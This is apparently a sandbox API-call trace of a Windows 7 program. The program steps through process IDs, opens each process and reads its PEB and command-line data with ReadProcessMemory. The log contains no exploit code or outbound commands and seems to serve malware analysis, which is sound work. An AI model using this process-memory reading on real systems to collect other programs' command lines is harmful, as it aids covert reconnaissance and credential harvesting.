[0413.196] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2088") returned 4
[0413.197] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.197] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.220] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x828) returned 0x24c
[0413.220] GetLastError () returned 0x0
[0413.220] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.220] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.221] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.221] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2628e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.221] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2626e0, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.222] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.223] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.224] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.224] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x261ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.224] malloc (_Size=0x60) returned 0x2c0790
[0413.224] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x262738, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.224] free (_Block=0x2c0790)
[0413.225] CloseHandle (hObject=0x24c) returned 1
[0413.229] _ui64tow (_Value=0x6e4, _Buffer="2088", _Radix=10) returned="1764"
[0413.234] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1764") returned 4
[0413.235] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.235] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.255] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e4) returned 0x24c
[0413.255] GetLastError () returned 0x0
[0413.255] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.255] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.256] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.256] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3828f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.256] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3826e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.257] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.258] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.258] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.258] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x381ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.259] malloc (_Size=0x62) returned 0x2c0790
[0413.259] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x38273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.259] free (_Block=0x2c0790)
[0413.260] CloseHandle (hObject=0x24c) returned 1
[0413.303] _ui64tow (_Value=0x71c, _Buffer="1764", _Radix=10) returned="1820"
[0413.308] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1820") returned 4
[0413.309] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x239, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.309] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.336] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x24c
[0413.336] GetLastError () returned 0x0
[0413.336] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.336] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.336] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.337] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x482920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.337] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4826f2, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.338] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.339] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.339] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.339] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.340] malloc (_Size=0x72) returned 0x2c1680
[0413.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x48275c, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.340] free (_Block=0x2c1680)
[0413.341] CloseHandle (hObject=0x24c) returned 1
[0413.341] _ui64tow (_Value=0x738, _Buffer="1820", _Radix=10) returned="1848"
[0413.346] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1848") returned 4
[0413.348] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.348] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x24c
[0413.370] GetLastError () returned 0x0
[0413.371] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5126ee, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.372] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.373] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.373] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.374] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.374] malloc (_Size=0x6a) returned 0x2c1680
[0413.374] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512750, lpBuffer=0x2c1680, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.374] free (_Block=0x2c1680)
[0413.375] CloseHandle (hObject=0x24c) returned 1
[0413.376] _ui64tow (_Value=0x830, _Buffer="1848", _Radix=10) returned="2096"
[0413.380] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2096") returned 4
[0413.385] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.385] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x24c
[0413.407] GetLastError () returned 0x0
[0413.407] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.407] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.407] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.408] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x72950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.408] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x726fa, lpBuffer=0x12dd100, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.411] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.412] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x71ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.413] malloc (_Size=0x7e) returned 0x2e3b90
[0413.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x72770, lpBuffer=0x2e3b90, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0413.413] free (_Block=0x2e3b90)
[0413.414] CloseHandle (hObject=0x24c) returned 1
[0413.415] _ui64tow (_Value=0x868, _Buffer="2096", _Radix=10) returned="2152"
[0413.419] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2152") returned 4
[0413.421] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.421] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.447] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x868) returned 0x24c
[0413.448] GetLastError () returned 0x0
[0413.448] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f26e0, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.449] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.450] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.450] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.451] malloc (_Size=0x72) returned 0x2c1680
[0413.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f274a, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.451] free (_Block=0x2c1680)
[0413.452] CloseHandle (hObject=0x24c) returned 1
[0413.453] _ui64tow (_Value=0x878, _Buffer="2152", _Radix=10) returned="2168"
[0413.457] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2168") returned 4
[0413.458] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.458] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x878) returned 0x24c
[0413.488] GetLastError () returned 0x0
[0413.488] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.488] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.488] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.489] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x482960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.489] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4826fa, lpBuffer=0x12dd100, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.490] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.491] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.491] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.491] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.492] malloc (_Size=0x84) returned 0x2e3a70
[0413.492] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x482776, lpBuffer=0x2e3a70, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0413.492] free (_Block=0x2e3a70)
[0413.493] CloseHandle (hObject=0x24c) returned 1
[0413.494] _ui64tow (_Value=0x884, _Buffer="2168", _Radix=10) returned="2180"
[0413.497] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2180") returned 4
[0413.499] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.499] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.520] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x24c
[0413.521] GetLastError () returned 0x0
[0413.521] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4426f6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.522] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.523] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.524] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.524] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.524] malloc (_Size=0x72) returned 0x2c1680
[0413.524] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442760, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.524] free (_Block=0x2c1680)
[0413.525] CloseHandle (hObject=0x24c) returned 1
[0413.526] _ui64tow (_Value=0x554, _Buffer="2180", _Radix=10) returned="1364"
[0413.530] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1364") returned 4
